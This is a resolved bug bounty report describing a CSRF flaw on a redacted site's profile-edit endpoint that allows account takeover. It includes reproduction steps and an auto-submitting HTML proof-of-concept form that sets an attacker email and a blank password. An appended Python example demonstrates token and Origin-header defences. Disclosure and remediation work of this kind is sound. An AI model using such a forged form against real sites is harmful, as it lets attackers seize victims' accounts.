CSRF leads to Account takeover
High
Vulnerability Details
**Description:**
During my search in this domain I found it vulnerable to CSRF, so I tried to escalate it to account takeover and I succeeded.
## Impact
Account takeover via CSRF
## System Host(s)
███████
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to Reproduce
Vulnerable domain and endpoint: https://██████████/account/profile/edit
1. Click on this URL: https://█████████/account/register and fill in the required fields.
2. You will be instructed to check your inbox for a verification email, but you can avoid this step and log in using the username and password you created on the registration page.
3. Navigate to this endpoint https://███████/account/profile/edit and attempt to modify the first name, email and password.
4. Observe this in the history of Burp Suite: https://███/account/profile/edit.
5. You can notice there is no protection against CSRF on this endpoint.
6. Executed the proof of concept (POC), and it worked.
## POC
```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://████████/account/profile/edit" method="POST">
<input type="hidden" name="username" value="hacker" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="cpassword" value="" />
<input type="hidden" name="email" value="mojejas248@esterace.com" />
<input type="hidden" name="save" value="Save" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
```
## Suggested Mitigation/Remediation Actions
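The report leaves this section empty. As an added illustration (not code from the report or from the affected site, whose framework is not on the page), the check below is what a server-side handler for a state-changing endpoint like `/account/profile/edit` needs so that the PoC above no longer works: a per-session synchronizer token embedded in the legitimate form, compared in constant time, plus a verification that the browser-supplied `Origin`/`Referer` header matches the site's own origin. `SITE_ORIGIN`, the `Session`/`Request` classes and the sample requests are assumptions constructed for the example.

```python
"""Server-side CSRF defence for a profile-edit form.

Added example only: the real endpoint's framework is not on the page, so the
session and request are modelled with small dataclasses (an assumption).
"""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlsplit

SITE_ORIGIN = "https://example.com"  # placeholder for the redacted host
TOKEN_FIELD = "csrf_token"


@dataclass
class Session:
    """Server-side session for one logged-in user (constructed stand-in)."""
    user: str
    # Random per-session token; a cross-site page can never read it.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """The subset of an HTTP request the check needs (constructed model)."""
    method: str
    headers: dict
    form: dict


def render_edit_form(session: Session) -> str:
    """Embed the session-bound token in the legitimate edit form."""
    return (
        f'<form action="{SITE_ORIGIN}/account/profile/edit" method="POST">'
        f'<input type="hidden" name="{TOKEN_FIELD}" value="{session.csrf_token}" />'
        '<input name="email" /><input name="password" /><input name="cpassword" />'
        '<input type="submit" name="save" value="Save" /></form>'
    )


def _origin_of(url: Optional[str]) -> Optional[str]:
    """Reduce a header value to scheme://host[:port]; None if absent or 'null'."""
    if not url:
        return None
    parts = urlsplit(url)
    if parts.scheme and parts.netloc:
        return f"{parts.scheme}://{parts.netloc}"
    return None


def csrf_rejection_reason(request: Request, session: Session) -> Optional[str]:
    """Return None if the request may proceed, otherwise why it is rejected.

    Two independent checks are applied to every state-changing method:
    1. the Origin (or, failing that, Referer) header must name our own site;
    2. the form must carry the token stored in the caller's session.
    """
    if request.method.upper() in ("GET", "HEAD", "OPTIONS"):
        return None  # safe methods must never change state, so no token needed
    origin = _origin_of(request.headers.get("Origin")) or _origin_of(
        request.headers.get("Referer")
    )
    if origin is None:
        return "missing Origin and Referer headers"
    if origin != SITE_ORIGIN:
        return f"cross-site request from {origin}"
    submitted = request.form.get(TOKEN_FIELD, "")
    # Constant-time comparison so token bytes cannot be guessed via timing.
    if not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
        return "missing or invalid CSRF token"
    return None


def handle_profile_edit(request: Request, session: Session) -> tuple:
    """Gate the profile update behind the CSRF check; returns (status, body)."""
    reason = csrf_rejection_reason(request, session)
    if reason:
        return 403, {"error": reason}
    updated = sorted(k for k in request.form if k not in (TOKEN_FIELD, "save"))
    return 200, {"updated": updated}  # real handler would persist the fields here


if __name__ == "__main__":
    alice = Session("alice")
    # Forged submission shaped like the PoC: auto-posted from another origin,
    # so the browser sends a foreign Origin and the form carries no token.
    forged = Request("POST", {"Origin": "https://attacker.example"},
                     {"username": "hacker", "password": "", "cpassword": "",
                      "email": "attacker@example.invalid", "save": "Save"})
    print(handle_profile_edit(forged, alice))
    # Legitimate submission from the rendered form on our own site.
    legit = Request("POST", {"Origin": SITE_ORIGIN},
                    {TOKEN_FIELD: alice.csrf_token, "email": "alice@example.com", "save": "Save"})
    print(handle_profile_edit(legit, alice))
```

The origin check alone would already stop the auto-submitting PoC, since browsers attach the attacking page's `Origin` to cross-site form POSTs; the token is what protects against cases where the header is absent or stripped, and marking the session cookie `SameSite=Lax` adds a third, browser-enforced layer. Requiring the current password for email and password changes would, separately, keep a single forged POST from completing a takeover.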
## Report Stats
- Report ID: 2699029
- State: Closed
- Substate: resolved
- Upvotes: 2